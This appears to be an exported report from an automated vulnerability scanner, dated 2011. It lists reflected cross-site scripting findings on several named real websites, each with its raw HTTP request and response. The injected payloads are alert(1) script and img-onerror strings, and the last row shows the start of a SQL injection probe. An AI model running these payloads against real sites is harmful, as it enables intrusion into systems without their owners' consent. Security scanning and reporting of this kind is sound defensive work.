GET /content/0/16228/124632 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=822523287793; __utmz=183366586 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 21:50:52 GMT Server: Apache Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT ETag: "55537c-d92-49e3c56e64300 Accept-Ranges: bytes Content-Length: 4280 Content-Type: application/x-javascript (function(){ var protocol = window.location.protocol; if (protocol == "https:") { protocol = "https://secure.img-cdn } else { protocol = "http://img-cdn.mediaplex }; ...[SNIP]... <mpcke/>'; if (mpcke == 1) { mpcclick = encodeURIComponent( mpck = "http://" + mpcclick; } else if (mpcke == 2) { mpcclick2 = encodeURIComponent( mpck = "ht ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /content/0/16228/124632 |
GET /content/0/16228/124632 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=822523287793; __utmz=183366586 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 21:50:54 GMT Server: Apache Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT ETag: "55537c-d92-49e3c56e64300 Accept-Ranges: bytes Content-Length: 4286 Content-Type: application/x-javascript (function(){ var protocol = window.location.protocol; if (protocol == "https:") { protocol = "https://secure.img-cdn } else { protocol = "http://img-cdn.mediaplex }; ...[SNIP]... <a href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /content/0/16228/124632 |
GET /content/0/16228/124632 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=822523287793; __utmz=183366586 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 21:51:52 GMT Server: Apache Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT ETag: "55537c-d92-49e3c56e64300 Accept-Ranges: bytes Content-Length: 4282 Content-Type: application/x-javascript (function(){ var protocol = window.location.protocol; if (protocol == "https:") { protocol = "https://secure.img-cdn } else { protocol = "http://img-cdn.mediaplex }; ...[SNIP]... <a href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /content/0/16228/124632 |
GET /content/0/16228/124632 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=822523287793; __utmz=183366586 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 21:51:50 GMT Server: Apache Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT ETag: "55537c-d92-49e3c56e64300 Accept-Ranges: bytes Content-Length: 4282 Content-Type: application/x-javascript (function(){ var protocol = window.location.protocol; if (protocol == "https:") { protocol = "https://secure.img-cdn } else { protocol = "http://img-cdn.mediaplex }; ...[SNIP]... <mpvce/>'; if (mpvce == 1) { mpvclick = encodeURIComponent("http: mpvc = mpvclick; } else if (mpvce == 2) { mpvclick2 = encodeURIComponent("http: ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://iqavu79a908u5 |
Path: | /gadgets/ifr |
GET /gadgets/ifr?url=http:/ Host: iqavu79a908u5vcecp0p Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 400 Bad Request P3P: CP="CAO PSA OUR" Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 21:11:26 GMT Expires: Fri, 06 May 2011 21:11:26 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Content-Length: 136 Unable to retrieve spec for http://www.google.com alert(1)//2a6a5889652. HTTP error 400 |
Severity: | High |
Confidence: | Certain |
Host: | http://jlinks.indust |
Path: | /jsct |
GET /jsct?sid=918&ct Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Connection: close Date: Fri, 06 May 2011 21:50:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Fri, 06 May 2011 21:50:08 GMT Content-Type: application/x-javascript Content-Length: 85 // Error: Unknown old section SCMAGAZINE_ROS9b3c3<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://jlinks.indust |
Path: | /jsct |
GET /jsct?sid=918&ct Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Connection: close Date: Fri, 06 May 2011 21:50:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Fri, 06 May 2011 21:50:28 GMT Content-Type: application/x-javascript Content-Length: 69 // Error: Unknown parameter e69b7<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://k830suiki828g |
Path: | /gadgets/ifr |
GET /gadgets/ifr?url=http:/ Host: k830suiki828goudg944 Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 400 Bad Request P3P: CP="CAO PSA OUR" Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 21:13:20 GMT Expires: Fri, 06 May 2011 21:13:20 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Content-Length: 138 Unable to retrieve spec for http://www.google.com alert(1)//0354955d84e. HTTP error 400 |
Severity: | High |
Confidence: | Certain |
Host: | http://kroogy.com |
Path: | /pub/banner_160_600.php |
GET /pub3e0ed<img%20src%3da Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/search User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: nscriptinfo=75cb7e9c |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:04:07 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.10 X-Powered-By: PleskLin Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 2125 <html> <head> <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com <style> <!-- .nesoternd { padding: 0px;margin:0 0px; background-color: ...[SNIP]... <strong>Pub3e0ed<img src=a onerror=alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://kroogy.com |
Path: | /pub/banner_728_90_random |
GET /pub15bf1<img%20src%3da Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: kroogy.com |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:03:28 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.10 X-Powered-By: PleskLin Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 2126 <html> <head> <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com <style> <!-- .nesoternd { padding: 0px;margin:0 0px; background-color: ...[SNIP]... <strong>Pub15bf1<img src=a onerror=alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://kroogy.com |
Path: | /search/web/Linkbucks |
GET /searchc3d36<img%20src%3da Host: kroogy.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: nscriptinfo=75cb7e9c |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:07:47 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.10 X-Powered-By: PleskLin Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 2128 <html> <head> <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com <style> <!-- .nesoternd { padding: 0px;margin:0 0px; background-color: ...[SNIP]... <strong>Searchc3d36<img src=a onerror=alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://kroogy.com |
Path: | /search/web/Linkbucks |
GET /search/web19465<img%20src%3da Host: kroogy.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: nscriptinfo=75cb7e9c |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:07:56 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.10 X-Powered-By: PleskLin Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 2117 <html> <head> <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com <style> <!-- .nesoternd { padding: 0px;margin:0 0px; background-color: ...[SNIP]... <strong>web19465<img src=a onerror=alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://learn.bridgefront |
Path: | /sendpassword |
GET /sendpassword?button1=Get Host: learn.bridgefront.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=199010044 |
HTTP/1.1 500 Internal Server Error Date: Fri, 06 May 2011 22:09:30 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: JSESSIONID=AD543B39B Content-Length: 6471 Connection: close Content-Type: text/html; charset=UTF-8 <html> <head><title>Application Error </title> <script language="JavaScript" type="text/JavaScript"> function showdiv2(param) { if(param=="show") { document.all.div1.style ...[SNIP]... <b> SERVER NAME: learn.bridgefront.com SERVER PORT: 80 REMOTE HOST: 173.193.214.243 EXCEPTION: java.lang.NullPointe JSP REQUESTED: /errorpage.jsp?button1 <table border="0"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://learn.bridgefront |
Path: | /sendpassword |
GET /sendpassword?button1=Get Host: learn.bridgefront.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=199010044 |
HTTP/1.1 500 Internal Server Error Date: Fri, 06 May 2011 22:20:26 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: JSESSIONID=1A39AB27A Content-Length: 6471 Connection: close Content-Type: text/html; charset=UTF-8 <html> <head><title>Application Error </title> <script language="JavaScript" type="text/JavaScript"> function showdiv2(param) { if(param=="show") { document.all.div1.style ...[SNIP]... > SERVER NAME: learn.bridgefront.com SERVER PORT: 80 REMOTE HOST: 173.193.214.243 EXCEPTION: java.lang.NullPointe JSP REQUESTED: /errorpage.jsp?button1 <table border="0"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://learn.bridgefront |
Path: | /sendpassword |
GET /sendpassword?button1=Get Host: learn.bridgefront.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=199010044 |
HTTP/1.1 500 Internal Server Error Date: Fri, 06 May 2011 22:31:21 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: JSESSIONID=9695723B5 Content-Length: 6471 Connection: close Content-Type: text/html; charset=UTF-8 <html> <head><title>Application Error </title> <script language="JavaScript" type="text/JavaScript"> function showdiv2(param) { if(param=="show") { document.all.div1.style ...[SNIP]... earn.bridgefront.com SERVER PORT: 80 REMOTE HOST: 173.193.214.243 EXCEPTION: java.lang.NullPointe JSP REQUESTED: /errorpage.jsp?button1 <table border="0"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://learn.bridgefront |
Path: | /sendpassword |
GET /sendpassword?button1=Get Host: learn.bridgefront.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=199010044 |
HTTP/1.1 500 Internal Server Error Date: Fri, 06 May 2011 22:45:38 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: JSESSIONID=B2D8F44A4 Content-Length: 6471 Connection: close Content-Type: text/html; charset=UTF-8 <html> <head><title>Application Error </title> <script language="JavaScript" type="text/JavaScript"> function showdiv2(param) { if(param=="show") { document.all.div1.style ...[SNIP]... SERVER PORT: 80 REMOTE HOST: 173.193.214.243 EXCEPTION: java.lang.NullPointe JSP REQUESTED: /errorpage.jsp?button1 <table border="0"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://learn.bridgefront |
Path: | /sendpassword |
GET /sendpassword?button1=Get Host: learn.bridgefront.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=199010044 |
HTTP/1.1 500 Internal Server Error Date: Fri, 06 May 2011 23:38:04 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: JSESSIONID=4857F165E Content-Length: 6474 Connection: close Content-Type: text/html; charset=UTF-8 <html> <head><title>Application Error </title> <script language="JavaScript" type="text/JavaScript"> function showdiv2(param) { if(param=="show") { document.all.div1.style ...[SNIP]... ointerException JSP REQUESTED: /errorpage.jsp?button1 <table border="0"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://learn.bridgefront |
Path: | /sendpassword |
GET /sendpassword?button1=Get Host: learn.bridgefront.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=199010044 |
HTTP/1.1 500 Internal Server Error Date: Fri, 06 May 2011 22:59:54 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: JSESSIONID=EBDDE5813 Content-Length: 6471 Connection: close Content-Type: text/html; charset=UTF-8 <html> <head><title>Application Error </title> <script language="JavaScript" type="text/JavaScript"> function showdiv2(param) { if(param=="show") { document.all.div1.style ...[SNIP]... 43 EXCEPTION: java.lang.NullPointe JSP REQUESTED: /errorpage.jsp?button1 <table border="0"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://learn.bridgefront |
Path: | /sendpassword |
GET /sendpassword?button1=Get Host: learn.bridgefront.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=199010044 |
HTTP/1.1 500 Internal Server Error Date: Fri, 06 May 2011 23:08:42 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: JSESSIONID=60C3DEE51 Content-Length: 6471 Connection: close Content-Type: text/html; charset=UTF-8 <html> <head><title>Application Error </title> <script language="JavaScript" type="text/JavaScript"> function showdiv2(param) { if(param=="show") { document.all.div1.style ...[SNIP]... java.lang.NullPointe JSP REQUESTED: /errorpage.jsp?button1 <table border="0"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://learn.bridgefront |
Path: | /sendpassword |
GET /sendpassword?button1=Get Host: learn.bridgefront.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=199010044 |
HTTP/1.1 500 Internal Server Error Date: Fri, 06 May 2011 23:23:23 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: JSESSIONID=D667D7ACE Content-Length: 6471 Connection: close Content-Type: text/html; charset=UTF-8 <html> <head><title>Application Error </title> <script language="JavaScript" type="text/JavaScript"> function showdiv2(param) { if(param=="show") { document.all.div1.style ...[SNIP]... PointerException JSP REQUESTED: /errorpage.jsp?button1 <table border="0"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://login.vindicosuite |
Path: | /AccountManager |
GET /AccountManager Referer: http://login.vindicosuite User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: login.vindicosuite.com Cookie: ASPSESSIONIDSSSCTDAT Accept-Encoding: gzip, deflate |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 3707 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Fri, 06 May 2011 17:20:55 GMT <!DOCTYPE html> <html xmlns="http://www.w3.org <!-- edited by Tim Whidden Today is 1/13/11. It is now 9:23 AM --> <head> <title>Password Reset</title> <script type="text ...[SNIP]... <div class='divMessage' ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://login.vindicosuite |
Path: | /AccountManager |
GET /AccountManager Host: login.vindicosuite.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDSSSCTDAT |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 3701 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Fri, 06 May 2011 17:19:36 GMT <!DOCTYPE html> <html xmlns="http://www.w3.org <!-- edited by Tim Whidden Today is 1/13/11. It is now 9:23 AM --> <head> <title>Password Reset</title> <script type="text ...[SNIP]... <div class='divMessage' ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://login.vindicosuite |
Path: | /default.asp |
GET /default.asp?message Host: login.vindicosuite.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDSSSCTDAT |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 2335 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Fri, 06 May 2011 17:21:14 GMT <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <META HTTP-EQUIV="CACHE-CONTROL <link rel="stylesheet" type="text/css" hre ...[SNIP]... <td width="247" height="33" colspan="2">Invalid Username and or Password8a741<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://login.vindicosuite |
Path: | /default.asp |
GET /default.asp?message Referer: http://login.vindicosuite User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: login.vindicosuite.com Cookie: ASPSESSIONIDSSSCTDAT Accept-Encoding: gzip, deflate |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 2341 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Fri, 06 May 2011 17:32:21 GMT <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <META HTTP-EQUIV="CACHE-CONTROL <link rel="stylesheet" type="text/css" hre ...[SNIP]... <td width="247" height="33" colspan="2">Invalid Username and or Password51889<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://r1rk9np7bpcsf |
Path: | /gadgets/ifr |
GET /gadgets/ifr?url=http:/ Host: r1rk9np7bpcsfoeekl0k Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 400 Bad Request P3P: CP="CAO PSA OUR" Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 21:06:58 GMT Expires: Fri, 06 May 2011 21:06:58 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Content-Length: 126 Unable to retrieve spec for http://www.google.com alert(1)//44bb86f9bed. HTTP error 400 |
Severity: | High |
Confidence: | Certain |
Host: | http://sales.liveperson |
Path: | /visitor/addons/deploy |
GET /visitor/addons/deploy Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.dynamicpe User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: LivePersonID=LP i=16601209214853,d |
HTTP/1.1 500 Internal Server Error Date: Sat, 07 May 2011 01:21:46 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Length: 459 Content-Type: text/html Set-Cookie: ASPSESSIONIDSSQSQTAC Cache-control: private //Plugins for site 56727252ec21a alert(1)//7e817ac7b43 <font face="Arial" size=2> <p>Server.MapPath()</font <p> <font face="Arial" size= ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | /index.php |
POST /index.php HTTP/1.1 Referer: https://secure.trust User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form Host: secure.trust-guard.com Cookie: PHPSESSID=todvqp9ae2 Accept-Encoding: gzip, deflate Content-Length: 38 btnLogin=Submit&txtEmail=16a1d<script>alert(1)< |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:57:38 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5133 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... <span id='lblResult' style='color:red; ' >We could not find the account 16a1d<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://subscribe |
Path: | /scm/ |
GET /scm/?form=4039d"%3balert(1)/ Host: subscribe.haymarketmedia Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: ASP.NET_SessionId X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 06 May 2011 21:49:28 GMT Content-Length: 5494 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><link href="Pubs/SC ...[SNIP]... <script type="text/javascript"> var pageTracker = _gat._getTracker("UA pageTracker._initData(); pageTracker._trackPa </script> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://support.expedia |
Path: | /app/answers/list/ |
GET /app/answers/list/?1cdc4"><a>ac9888ba52a=1 HTTP/1.1 Host: support.expedia.com Proxy-Connection: keep-alive Referer: http://support.expedia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:53:03 GMT Server: Apache P3P: policyref="http://support Set-Cookie: cp_session=VS9RJQx4B RNT-Time: D=3309637 t=1304722383037218 RNT-Machine: 02 Vary: Accept-Encoding X-Cnection: close Content-Type: text/html; charset=UTF-8 Content-Length: 95354 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a class = "noIntercept" href="/app/answers/list/?1cdc4"><a>ac9888ba52a=1/kw/" > ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tours.sapha.com |
Path: | / |
GET /?scs_sid=-111%27%20OR Host: tours.sapha.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715 |
